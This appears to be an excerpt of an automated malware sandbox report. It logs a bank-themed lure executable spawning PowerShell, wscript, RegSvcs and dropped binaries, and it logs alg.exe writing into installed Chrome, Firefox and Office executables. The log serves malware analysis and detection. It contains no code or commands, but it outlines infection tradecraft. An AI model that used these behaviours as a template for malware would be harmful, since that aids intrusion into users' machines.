Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 11401068
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4392960
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4966476
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4966400
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 2843313
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 1755648
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 2329164
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 2329088
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 740604
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 3347968
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 3921484
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 3921408
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 1777084
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 6470144
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 7043660
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 7043584
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 2807964
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 6470144
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 7043660
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 7043584
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 2807964
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 1665536
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 2239052
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 2238976
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 853340
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 1861120
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 2434636
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 2434560
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 910188
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1445888
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 2019404
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 2019328
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 728892
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 248832
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 822348
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 822272
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 121980
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 707072
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 1280588
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 1280512
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 346881
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 666112
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 1239628
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 1239552
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 193089
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 228352
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 801868
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 801792
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 43297
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 762368
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 1335884
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 1335808
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 239297
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 70144
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 643660
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 643584
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 32241
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 279040
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 852556
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 852480
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 111633
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 55296
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 628812
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 628736
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 4108
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 403968
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 977484
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 977408
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 79009
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 224256
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 797772
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 797696
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 35826
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_004048D7
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00485376
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00423187
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\differences\niellist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
